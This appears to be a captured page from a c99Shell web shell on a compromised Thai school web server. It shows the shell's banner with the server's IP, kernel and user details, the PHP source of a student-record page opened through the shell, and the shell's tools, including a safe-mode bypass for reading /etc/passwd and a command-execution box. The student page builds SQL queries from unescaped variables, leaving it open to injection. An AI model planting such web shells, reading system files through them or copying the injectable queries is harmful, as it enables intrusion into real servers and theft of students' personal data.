110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/ drwxrwxrwx Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php
 session_start();
 if (session_is_registered("valid_user")&&session_is_registered("password")&&session_is_registered("Priority"))
 {
 $Username = $valid_user;
 $Password = $password;
include("../../../include/FunctionDB.php");
include("../../../include/Function.php");
ConnectDB();
$sql = "Select * From user_tb Where Username='$Username'";
$result = mysql_query($sql) or die(" Error".mysql_error());
$rs1 = mysql_fetch_array($result);
$Username = $rs1[Username];
$sql1 = "Select * From student_tb Where Student_id='$Student_id'";
$result1 = mysql_query($sql1) or die(" Error".mysql_error());
$rs = mysql_fetch_array($result1);
?>
<html>
<head>
<title>Parent Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../../css/style1.css" rel="stylesheet" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--



function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr> 
    <td width="20%" background="../../../Image/bare3.jpg" class="table"> <div align="center"><strong><font size="2" face="Tahoma"><a href="../../Edu_Menu.php" class="d">ЎЕСєЛ№йТЛЕСЎ</a></font></strong></div></td>
    <td width="20%" background="../../../Image/bare3.jpg" class="table"> <div align="center"><font size="2" face="Tahoma"><strong><a href="../AllDetail.php?Student_id=<? echo $rs[Student_id]?>" class="d">бКґ§·Сй§ЛБґ</a></strong></font></div></td>
    <td width="20%" background="../../../Image/bare3.jpg" class="table"><div align="center"><font size="2" face="Tahoma"><strong><a href="../FrmEditStd.php?Student_id=<? echo $rs[Student_id]?>" class="d">бЎйдў</a></strong></font></div></td>
    <td width="20%" background="../../../Image/bare3.jpg" class="table"> <div align="center" ><strong><font size="2" face="Tahoma"><a href="../../../logout.php" class="d">Logout</a></font></strong></div></td>
  </tr>
</table>
<table width="100%" border="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" style="border:1px solid gray">
  <tr bgcolor="#F1F3FE"> 
    <td colspan="2"> <div align="center"><font size="4" face="Tahoma"><strong>ўйНБЩЕјЩй»Ў¤ГН§</strong></font></div></td>
  </tr>
  <tr> 
    <td width="83%"> <table width="100%" border="0" cellpadding="0" cellspacing="1" bordercolor="#999999">
        <tr bgcolor="#FFFFFF"> 
          <td width="33%" bgcolor="#FFFEF4"> <div align="center"><font color="#003366" size="2" face="Tahoma">ГЛСК</font></div></td>
          <td width="67%" bgcolor="#FFFEF4"><font color="#003300" size="2" face="Tahoma"> 
            <?=$rs["Student_id"]?>
            </font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td bgcolor="#FFFEF4"> <div align="center"><font color="#003366" size="2" face="Tahoma">ЄЧиН-№ТБКЎШЕ</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#003300" size="2" face="Tahoma"> 
            <?=$rs["First_name"]?>
            <?=$rs["Name"]?>
            <?=$rs["Lastname"]?>
            </font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td bgcolor="#FFFEF4"> <div align="center"><font color="#003366" size="2" face="Tahoma">ЛЕСЎКЩµГ</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#003300" size="2" face="Tahoma"> 
            <?php
               $Course_code =  $rs["Course_code"];
               $sql2= "Select * From course_tb Where Course_code='$Course_code'";
               $result2 = mysql_query($sql2) or die("Error Select".mysql_query());
               $rs2 = mysql_fetch_array($result2);
               echo"$rs2[Course_name]";
               ?>
            ГШи№ </font><font color="#990099" size="2" face="Tahoma"><a href="../../Scholarship/ActivityDetail.php?code=<?=$row["code"]?>" title="Click to see Detail"  class="d"> 
            <?=$rs["Class"]?>
            </a></font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td bgcolor="#FFFEF4"> <div align="center"><font size="2" face="Tahoma">НТВШ</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#003366" size="2" face="Tahoma"> 
            <?php //// Show Age
      $age =  $rs[DateBirth];
      $year =  explode("-",$age);
      $year =   intval($year[0]);    
      $year = $year - 543;
      $currentyear = date("Y");
    //  $currentyear =   intval($currentyear[0]);          
      $age = $currentyear - $year ;
      echo"$age";
      ?>
            </font><font color="#000000" size="2" face="Tahoma">»Х</font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td bgcolor="#FFFEF4"> <div align="center"><font size="2" face="Tahoma">ЄЧиНєФґТ</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#000000" size="2" face="Tahoma"> 
            <?=$rs["Father_name"]?>
            </font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td height="20" bgcolor="#FFFEF4"><div align="center"><font size="2" face="Tahoma">ЄЧиНБТГґТ</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#000000" size="2" face="Tahoma"> 
            <?=$rs["Mother_name"]?>
            </font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td height="18" bgcolor="#FFFEF4"> <div align="center"><font size="2" face="Tahoma">·ХиНВЩи</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#000000" size="2" face="Tahoma"> 
            <?=$rs["Address2"]?>
            </font><font color="#003300" size="2" face="Tahoma">&nbsp; </font></td>
        </tr>
        <tr bgcolor="#FFFFFF"> 
          <td height="20" bgcolor="#FFFEF4"><div align="center"><font size="2" face="Tahoma">аєНГмв·Г</font></div></td>
          <td bgcolor="#FFFEF4"><font color="#000000" size="2" face="Tahoma"> 
            <?=$rs["Telno"]?>
            </font></td>
        </tr>
      </table></td>
    <td width="17%" colspan="-2" bgcolor="#FFFFFF"> 
      <div align="center"> 
        <?php
        echo"<center>";
        echo"<img src=\"../$rs[Img1]\" width=\"100\" height=\"110\" >";
        echo"</center>";
       ?>
      </div></td>
  </tr>
  <tr bgcolor="#F1F3FE"> 
    <td height="20" colspan="2">&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php 
    }
else
{
    echo"<body bgcolor=\"#CCCCCC\">";
     echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo"<center>";
      echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
      echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> ¤ШідБиБХКФ·ёмгЄй§Т№</font>";
      echo"</center>";
      echo"</body>";
} 
?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: